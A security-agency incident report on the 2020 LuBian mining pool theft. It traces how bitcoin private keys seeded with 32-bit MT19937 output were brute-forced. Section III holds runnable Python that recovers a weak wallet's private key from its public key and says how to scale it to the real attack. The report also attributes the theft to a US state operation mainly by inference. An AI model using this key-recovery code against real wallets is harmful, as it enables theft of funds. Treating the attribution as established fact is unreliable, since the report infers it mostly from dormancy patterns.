Author: National Computer Virus Emergency Response Center
On December 29, 2020, LuBian mining pool suffered a major hacking attack, with a total of 127,272.06953176 Bitcoins (worth approximately $3.5 billion at the time, now worth $15 billion) stolen by the attackers. The holder of this huge amount of Bitcoins was Chen Zhi, chairman of the Prince Group of Cambodia.
Following the hacking incident, Chen Zhi and his Prince Group posted messages on the blockchain multiple times in early 2021 and July 2022, appealing to the hackers to return the stolen Bitcoins and offering to pay a ransom, but received no response.
Strangely, after this huge sum of Bitcoin was stolen, it remained dormant in a Bitcoin wallet address controlled by the attackers for four years, almost untouched. This clearly doesn't conform to the typical behavior of hackers eager to cash out and pursue profits; it seems more like a precise operation orchestrated by a "nation-state hacking organization." It wasn't until June 2024 that the stolen Bitcoin was transferred to a new Bitcoin wallet address, where it has remained untouched ever since.
On October 14, 2025, the U.S. Department of Justice announced criminal charges against Chen Zhi and the seizure of 127,000 Bitcoins from Chen Zhi and his Prince Group. Evidence suggests that the massive amount of Bitcoins seized by the U.S. government from Chen Zhi and his Prince Group were actually Bitcoins from the LuBian mining pool that had already been stolen by hackers using technical means back in 2020. In other words, the U.S. government may have already stolen 127,000 Bitcoins held by Chen Zhi through hacking techniques as early as 2020; this is a classic case of a "double-cross" operation orchestrated by a state-sponsored hacking group.
This report takes a technical perspective, tracing the technical origins of the incident to provide an in-depth analysis of the key technical details. It focuses on the ins and outs of the theft of these Bitcoins, reconstructing the complete attack timeline, and assessing Bitcoin's security mechanisms, hoping to provide valuable security insights for the cryptocurrency industry and users.
I. Background of the Event
LuBian mining pool, established in early 2020, was a rapidly rising Bitcoin mining pool with primary operations in China and Iran. In December 2020, LuBian suffered a massive hack, resulting in the theft of over 90% of its Bitcoin holdings. The total amount stolen was 127,272.06953176 BTC, which largely matches the 127,271 BTC claimed in the US Department of Justice indictment.
LuBian operated on a centralized model: mining rewards were pooled in pool-controlled addresses and distributed from there. The Bitcoin in those addresses was not held on regulated centralized exchanges but in non-custodial wallets. Non-custodial wallets, of which cold wallets and hardware wallets are the best-known forms, are widely regarded as the safest home for crypto assets: unlike an exchange account, which can be frozen by a single order, they are a private vault whose key (the private key) is held only by the owner. The caveat, and the one this incident turns on, is that this safety rests entirely on the private key being secret and unpredictable; a non-custodial wallet with a weak key is weaker than any exchange account.
In Bitcoin, on-chain addresses identify the ownership and flow of funds. Whoever controls the private key of an address has complete control over the Bitcoin held at that address. According to reports from on-chain analytics firms, the massive amount of Bitcoin formerly held by Chen Zhi and now controlled by the US government overlaps heavily with the funds taken in the LuBian mining pool hack.
On-chain data records show that on December 29, 2020 (Beijing time), LuBian's core Bitcoin wallet address underwent an abnormal transfer, with a total transfer amount of 127,272.06953176 BTC, which is basically consistent with the 127,271 BTC mentioned in the US Department of Justice indictment. This batch of stolen Bitcoin remained dormant until June 2024 after the abnormal transfer.
Between June 22 and July 23, 2024 (Beijing time), the stolen Bitcoins were transferred to a new set of on-chain addresses and have remained untouched since. Arkham Intelligence, a well-known US blockchain tracking platform, has labeled these final addresses as held by the US government. The US government has not disclosed in its indictment how it obtained the private keys to Chen Zhi's Bitcoin addresses.

Figure 1: Timeline of Key Activities
II. Attack Link Analysis
Random numbers are the cornerstone of cryptographic security in blockchain systems. Bitcoin uses asymmetric cryptography (ECDSA over the secp256k1 curve); a private key is a 256-bit random number, and exhaustively searching the key space would take on the order of 2^256 attempts, which is infeasible. However, if the 256-bit private key is not generated from full-strength randomness, for example if only 32 bits are actually random and the remaining 224 bits are derived deterministically from them, the effective strength collapses to 32 bits and the key can be brute-forced in at most 2^32 (approximately 4.29 billion) attempts. This is not hypothetical: in September 2022, the UK cryptocurrency market maker Wintermute lost $160 million through a comparable weak-randomness flaw in the Profanity vanity-address generator.
In August 2023, the security research team behind the "Milk Sad" disclosure first announced a pseudo-random number generator (PRNG) vulnerability in a third-party key generation tool and obtained a CVE identifier for it (CVE-2023-39910). Their research report noted that the LuBian Bitcoin mining pool had a similar weakness, and the set of compromised LuBian addresses they disclosed includes all 25 Bitcoin addresses listed in the US Department of Justice indictment.

Figure 2: List of 25 Bitcoin wallet addresses in the U.S. Department of Justice indictment
As a non-custodial Bitcoin wallet system, LuBian relied on a custom private key generation algorithm to manage funds. Instead of drawing 256 bits from a cryptographically secure source as recommended, the algorithm drew all of its randomness from a 32-bit value: it seeded a non-cryptographic "pseudo-random number generator" (Mersenne Twister, MT19937-32) with a timestamp or other weak 32-bit input and derived the private key from that generator's output. Whatever the generator produces downstream, the whole key space is therefore only as large as the seed space: the randomness of a 4-byte integer, which is trivially exhaustible on modern hardware. Each guess has a 1 in 2^32 chance of being right, so in the worst case an attacker must try all 2^32 seeds. At 10^6 keys per second that is roughly 4,300 seconds (about 1.2 hours); GPU-accelerated tools such as Hashcat or custom scripts can shorten this to minutes. Attackers exploited this vulnerability to drain the LuBian mining pool's Bitcoin.

Figure 3: Comparison Table of LuBian Mining Pool's Defects Compared with Industry Safety Standards
Through technical tracing, the complete timeline and related details of the LuBian mining pool hack are as follows:
1. Attack and Theft Phase: December 29, 2020 (Beijing Time)
Incident: Hackers exploited the private key generation vulnerability to recover the private keys of over 5,000 weakly generated wallet addresses (wallet type: P2WPKH nested in P2SH, prefix 3). Within approximately two hours, about 127,272.06953176 BTC (worth approximately $3.5 billion at the time) was drained from these addresses, leaving less than 200 BTC behind. All of the suspicious transactions carried the same transaction fee, indicating that the sweep was executed by an automated bulk-transfer script.
Sender: LuBian mining pool weak random Bitcoin wallet address group (controlled by the LuBian mining farm operating entity, belonging to Chen Zhi's Prince Group);
Recipient: A group of Bitcoin wallet addresses controlled by the attacker (undisclosed addresses);
Transfer path: Weak wallet address group → Attacker's wallet address group;
Correlation analysis: The total amount stolen was 127,272.06953176 BTC, which is basically consistent with the 127,271 BTC mentioned in the US Department of Justice indictment.
2. Dormant Phase: December 30, 2020 to June 22, 2024 (Beijing Time)
Event: This batch of Bitcoins, stolen in 2020 through the pseudo-random number vulnerability, remained dormant in attacker-controlled wallet addresses for as long as four years. Less than one ten-thousandth of the balance moved, in dust-sized transactions that may have been test transfers.
Correlation analysis: This batch of Bitcoins remained almost untouched until it was fully taken over by the US government on June 22, 2024. This is clearly inconsistent with the behavior of ordinary hackers, who are eager to cash out and pursue profit. It looks more like a precise operation orchestrated by a state-backed hacking organization.
3. Recovery Attempt Phase: Early 2021, July 4 and 26, 2022 (Beijing Time)
Event: After the theft, during the dormant period, the LuBian mining pool sent over 1,500 messages in early 2021 (costing approximately 1.4 BTC in fees) through Bitcoin's OP_RETURN output type, which embeds arbitrary data in a transaction, pleading with the hackers to return the funds. Example message: "Please return our funds, we'll pay a reward." On July 4 and 26, 2022, the LuBian mining pool again sent OP_RETURN messages; example message: "MSG from LB. To the whitehat who is saving our asset, you can contact us through 1228btc@gmail.com to discuss the return of asset and your reward."
Sender: Lubian weakly random Bitcoin wallet address (controlled by the Lubian mining farm operating entity, belonging to Chen Zhi's Prince Group);
Recipient: A group of Bitcoin wallet addresses controlled by the attacker;
Transfer path: weak wallet address group → attacker wallet address group (small transactions carrying OP_RETURN outputs);
Correlation analysis: After the theft, these messages were confirmed to be multiple attempts by LuBian mining pool, as the sender, to contact a "third-party hacker" to request the return of assets and discuss ransom matters.
4. Activation and Transfer Phase: June 22 to July 23, 2024 (Beijing Time)
Incident: Bitcoins in the group of dormant wallet addresses controlled by the attackers were activated and transferred to a final set of wallet addresses. Arkham Intelligence, a well-known US blockchain tracking platform, has labeled these final addresses as held by the US government.
Sender: A group of Bitcoin wallet addresses controlled by the attacker;
Recipient: New consolidated final wallet address group (not publicly disclosed, but identified as a wallet address group controlled by the US government);
Transfer path: Bitcoin wallet address group controlled by attackers → wallet address group controlled by the US government;
Correlation analysis: This batch of stolen Bitcoins remained largely untouched for four years before finally being taken over by the US government.
5. Notice of Seizure: October 14, 2025 (US local time)
Event: The U.S. Department of Justice issued a statement announcing charges against Chen Zhi and "confiscating" 127,000 bitcoins in his possession.
Because all Bitcoin transactions are public and permanently recorded, the history of any balance can be traced. On that basis, this report traced the origin of the funds drained from the LuBian weakly generated wallet addresses (controlled by the LuBian mining operation entity, possibly belonging to Chen Zhi's Prince Group). Of the 127,272.06953176 stolen Bitcoins, approximately 17,800 originated from the pool's own mining, approximately 2,300 from mining pool payouts, and approximately 107,100 from exchanges and other channels. These preliminary results are at odds with the US Department of Justice indictment's claim that all of the Bitcoins originated from illicit income.
III. Detailed Analysis of Vulnerability Technologies
1. Generating a Bitcoin wallet address private key:
The core vulnerability in the LuBian mining pool lies in its private key generator, which shares a flaw with the "Milk Sad" defect in Libbitcoin Explorer. Specifically, the system used the Mersenne Twister (MT19937-32) pseudo-random number generator initialized with only a 32-bit seed, so the effective entropy of every key it produced was 32 bits. MT19937 is a non-cryptographic generator: its output is predictable from its seed and its internal state can be reconstructed from its output. An attacker therefore enumerates all 2^32 possible seeds (0 to 2^32-1), derives the candidate private key for each, computes the corresponding address, and checks it against the public key hash (hash160) of a known wallet address.
The derivation path at issue is: random seed → SHA-256 hash → ECDSA private key. With a 256-bit seed from a cryptographically secure source the hash step is harmless; with a 32-bit seed it adds nothing, because hashing cannot create entropy that the input never had.
LuBian's underlying library may have been custom code or an open-source library (such as Libbitcoin), but either way it neglected entropy security. Similarly, the Libbitcoin Explorer "bx seed" command at the heart of Milk Sad used the MT19937-32 generator seeded only with a timestamp or other weak input, leaving the resulting private keys open to brute force. In the LuBian attack over 5,000 wallets were affected, indicating that the flaw was systemic and most likely came from reusing one generator during bulk wallet creation.
2. Simulated attack process:
(1) Identify the target wallet address (by monitoring LuBian mining pool activity on-chain);
(2) Enumerate the 32-bit seed: for seed in 0 to 4294967295;
(3) Generate private key: private_key = SHA256(seed);
(4) Derive the public key and address: computed on the ECDSA secp256k1 curve;
(5) Matching: If the derived address matches the target, the transaction is signed using the private key to steal funds;
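The following is an added example for this report, not LuBian's generator and not the Milk Sad team's tooling. It implements the five steps above end to end: a victim derives a key from a 32-bit seed fed into MT19937 (Python's `random.Random` is MT19937), and an attacker who sees only the public key recovers the seed, and with it the private key, by enumeration. Two details are assumptions rather than facts from the report: the exact mixing step (MT19937 output → SHA-256 → private key) and matching on the compressed public key instead of the address hash160, which keeps the code to the standard library; neither changes the 2^32 key space. The hardened generator from a CSPRNG is shown alongside for contrast.

```python
"""Brute-forcing a 32-bit-seeded wallet key (added example, not LuBian code).

Assumptions (not stated by the report):
  * seed mixing is modelled as MT19937(seed) -> 32 output bytes -> SHA-256
    -> private key; any other fixed mixing step gives the same 2^32 key space
  * candidates are matched on the compressed public key instead of the
    address hash160, so the example needs only the Python standard library
"""
import hashlib
import random
import secrets

# secp256k1 domain parameters (field prime, group order, generator point)
P = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)


def _point_add(p1, p2):
    """Affine point addition on secp256k1; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if p1 == p2:
        lam = 3 * x1 * x1 * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return x3, (lam * (x1 - x3) - y1) % P


def _scalar_mul(k, point):
    """Double-and-add scalar multiplication (demo only, no side-channel hardening)."""
    acc = None
    while k:
        if k & 1:
            acc = _point_add(acc, point)
        point = _point_add(point, point)
        k >>= 1
    return acc


def compressed_pubkey(priv):
    """33-byte SEC1 compressed public key (02/03 prefix + x) for a private scalar."""
    x, y = _scalar_mul(priv, G)
    return bytes([2 + (y & 1)]) + x.to_bytes(32, "big")


def weak_private_key(seed32):
    """The flawed design: every bit of the key is a function of one 32-bit seed.

    random.Random is MT19937, the generator the report names; seeding it with a
    32-bit integer reproduces the 2^32 key space exactly.  Drawing 256 bits of
    output and hashing them does not add entropy.
    """
    rng = random.Random(seed32)
    raw = rng.getrandbits(256).to_bytes(32, "big")
    return int.from_bytes(hashlib.sha256(raw).digest(), "big") % (N - 1) + 1


def strong_private_key():
    """The hardened form: 256 bits straight from the OS CSPRNG, reduced into [1, N-1]."""
    return secrets.randbits(256) % (N - 1) + 1


def recover_seed(target_pub, search_space):
    """Attacker side: enumerate seeds until the derived public key matches.

    A real attacker walks the full range(2**32) and compares hash160 values
    computed from the on-chain addresses; search_space is capped here only so
    the demo finishes in seconds.
    """
    for seed in range(search_space):
        if compressed_pubkey(weak_private_key(seed)) == target_pub:
            return seed
    return None


VICTIM_SEED = 0x1A3   # constructed value standing in for a timestamp-derived seed


def demo(search_space=1 << 9):
    """Victim derives a key from a weak seed; attacker recovers it from the pubkey alone."""
    victim_priv = weak_private_key(VICTIM_SEED)
    observed_pub = compressed_pubkey(victim_priv)          # what the chain reveals
    found_seed = recover_seed(observed_pub, search_space)
    recovered = found_seed is not None and weak_private_key(found_seed) == victim_priv
    return {"seed": found_seed, "key_recovered": recovered}


if __name__ == "__main__":
    print(demo())
```

The search here stops at 512 seeds so it runs in a few seconds of pure Python; scaling the same loop to all 2^32 seeds, with hash160 matching against every pool address at once (a set lookup rather than one target), is the whole difference between this demo and the 2020 sweep. Note that `strong_private_key` cannot be attacked this way at all: with 256 bits of CSPRNG input there is no small seed to enumerate.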
Comparison with similar vulnerabilities: This flaw resembles the 32-bit entropy defect in the Trust Wallet browser extension, which allowed large-scale recovery of wallet private keys, and the "Milk Sad" vulnerability in Libbitcoin Explorer, which exposed private keys through the same low-entropy seeding. All of these cases stem from early codebases that did not generate keys from full-strength entropy. The BIP-39 standard (12 to 24 word seed phrases) helps only because it encodes 128 to 256 bits drawn from a cryptographically secure source; a mnemonic built from a weak seed is just as breakable, which is exactly how the Milk Sad wallets were lost. LuBian may have used a custom algorithm designed to simplify key management but neglected security.
Defense deficiencies: LuBian mining pool did not implement multisignature (multisig), hardware wallets, or hierarchical deterministic wallets (HD wallets), all of which could improve security. On-chain data shows that the attack covered multiple wallets, indicating a systemic vulnerability rather than a single point of failure.
3. On-chain evidence and recovery attempts:
OP_RETURN messages: LuBian sent over 1,500 messages through Bitcoin's OP_RETURN output type, spending 1.4 BTC in fees, pleading with the attackers to return the funds. Because these messages were signed by the keys of the drained addresses and recorded on the blockchain, they demonstrate that the original holder was the one appealing for the funds' return; they cannot be forged after the fact. Example messages include "Please return our funds" and similar requests, spread across many transactions.
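An OP_RETURN output is a scriptPubKey of the form `OP_RETURN <push of data>`, so recovering the pleas from the chain is a matter of walking each transaction's outputs and decoding the push. The following is an added example for this report, not code from LuBian or any tracing vendor: a parser for that script format that handles every push encoding (direct pushes up to 75 bytes, OP_PUSHDATA1/2/4) and rejects malformed scripts, a builder that splits a message into outputs that stay within Bitcoin Core's default 80-byte standard payload limit, and a constructed sample set of outputs (a P2SH change output plus OP_RETURN outputs carrying the message quoted above). The scripts are constructed here, not copied from the real transactions.

```python
"""Decoding OP_RETURN messages from transaction outputs (added example).

Not LuBian's or any tracing vendor's code.  The output scripts below are
constructed for the example; only the message text is quoted from the report.
"""
OP_0, OP_RETURN = 0x00, 0x6A
OP_PUSHDATA1, OP_PUSHDATA2, OP_PUSHDATA4 = 0x4C, 0x4D, 0x4E
# Bitcoin Core's default datacarriersize is 83 bytes of script; after OP_RETURN
# and the two-byte OP_PUSHDATA1 push header that leaves 80 bytes of payload.
MAX_STANDARD_PAYLOAD = 80


def push_bytes(data):
    """Minimal-encoding data push, as standardness rules require."""
    n = len(data)
    if n <= 75:
        return bytes([n]) + data
    if n <= 0xFF:
        return bytes([OP_PUSHDATA1, n]) + data
    if n <= 0xFFFF:
        return bytes([OP_PUSHDATA2]) + n.to_bytes(2, "little") + data
    return bytes([OP_PUSHDATA4]) + n.to_bytes(4, "little") + data


def build_op_return(payload):
    """scriptPubKey for a provably unspendable data-carrier output."""
    return bytes([OP_RETURN]) + push_bytes(payload)


def parse_op_return(script):
    """Return the data pushes following OP_RETURN, or None for any other script type.

    Raises ValueError on truncated or non-push scripts instead of returning
    partial data, so a corrupt input cannot be mistaken for a short message.
    """
    if not script or script[0] != OP_RETURN:
        return None
    pushes, i = [], 1
    while i < len(script):
        op = script[i]
        i += 1
        if op == OP_0:                          # OP_0 pushes the empty vector
            pushes.append(b"")
            continue
        if 0x51 <= op <= 0x60:                  # OP_1..OP_16 push one small integer
            pushes.append(bytes([op - 0x50]))
            continue
        if 1 <= op <= 75:                       # opcode byte is the length
            n = op
        elif op in (OP_PUSHDATA1, OP_PUSHDATA2, OP_PUSHDATA4):
            width = {OP_PUSHDATA1: 1, OP_PUSHDATA2: 2, OP_PUSHDATA4: 4}[op]
            if i + width > len(script):
                raise ValueError("truncated push length")
            n = int.from_bytes(script[i:i + width], "little")
            i += width
        else:
            raise ValueError(f"non-push opcode 0x{op:02x} after OP_RETURN")
        if i + n > len(script):
            raise ValueError("push runs past end of script")
        pushes.append(script[i:i + n])
        i += n
    return pushes


def split_message(text, limit=MAX_STANDARD_PAYLOAD):
    """Chunk a message into OP_RETURN scripts that each satisfy standard relay policy."""
    data = text.encode("utf-8")
    return [build_op_return(data[k:k + limit]) for k in range(0, len(data), limit)]


def extract_messages(script_pubkeys):
    """Collect text payloads from output scripts (hex or bytes), skipping non-OP_RETURN outputs."""
    out = []
    for spk in script_pubkeys:
        raw = bytes.fromhex(spk) if isinstance(spk, str) else spk
        pushes = parse_op_return(raw)
        if pushes:
            out.append(b"".join(pushes).decode("utf-8", errors="replace"))
    return out


# Constructed sample outputs: one P2SH output (OP_HASH160 <20 bytes> OP_EQUAL,
# the "prefix 3" address type the pool used) followed by the plea from the report,
# split into 80-byte and 66-byte OP_RETURN outputs.
PLEA = ("MSG from LB. To the whitehat who is saving our asset, you can contact us "
        "through 1228btc@gmail.com to discuss the return of asset and your reward.")
SAMPLE_OUTPUTS = [bytes.fromhex("a914" + "11" * 20 + "87")] + split_message(PLEA)


if __name__ == "__main__":
    for message in extract_messages(SAMPLE_OUTPUTS):
        print(repr(message))
```

Running the block prints the two fragments of the plea; concatenating the fragments from consecutive outputs (or consecutive transactions, which is how a 146-byte message has to be sent under the 80-byte limit) reproduces the full text. The 80-byte chunk exercises the OP_PUSHDATA1 path, the 66-byte chunk the direct-push path.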
4. Attack Correlation Analysis:
The U.S. Department of Justice, in its criminal indictment against Chen Zhi dated October 14, 2025 (case number 1:25-cr-00416), listed 25 Bitcoin wallet addresses holding approximately 127,271 BTC, worth approximately $15 billion, which have been seized. Through blockchain analysis and review of official documents, these addresses are highly correlated with the LuBian mining pool attack.
Direct Connection: Blockchain analysis reveals that 25 addresses listed in the U.S. Department of Justice indictment are the final holding addresses of the Bitcoin stolen during the 2020 LuBian mining pool attack. An Elliptic report indicates that this Bitcoin was "stolen" from LuBian's mining operations in 2020. Arkham Intelligence confirms that the funds seized by the U.S. Department of Justice are directly related to the LuBian mining pool theft.
Evidence in the indictment: Although the U.S. Department of Justice indictment does not directly name the “LuBian hack,” it mentions that the funds originated from “theft attacks on Bitcoin mining operations in Iran and China,” which is consistent with on-chain analysis by Elliptic and Arkham Intelligence.
Attack correlation: Judging from the attack methods, LuBian's huge Bitcoin holdings were stolen in a technical attack in 2020 and then sat dormant for four years, with less than one ten-thousandth of the balance moving in that period, until the US government took full control of them in 2024. This is inconsistent with the behavior of hackers who are eager to cash out and pursue profit and looks more like a precise operation orchestrated by a state-backed hacking organization. Analysts believe the US government may have already taken control of this batch of Bitcoin in December 2020.
IV. Impacts and Recommendations
The 2020 hack of the LuBian mining pool had far-reaching consequences: it led to the pool's effective dissolution and cost it more than 90% of its total assets at the time. The stolen Bitcoin is now worth $15 billion, showing how price appreciation can magnify the consequences of a single key-management failure.
The LuBian incident exposed systemic risk in random number generation across cryptocurrency toolchains. To prevent similar vulnerabilities, the blockchain industry should generate keys only from cryptographically secure pseudo-random number generators (CSPRNGs); implement layered defenses, including multisignature (multisig), cold storage, and regular auditing; and avoid custom private key generation algorithms altogether. Mining pools should add real-time on-chain monitoring and alerting for abnormal transfers. Ordinary users should avoid unverified key generation code, including unaudited modules from open-source communities. The incident is also a reminder that blockchain transparency does not compensate for a weak security foundation, which can still lead to catastrophic consequences, and that cybersecurity is fundamental to the future of the digital economy and digital currencies.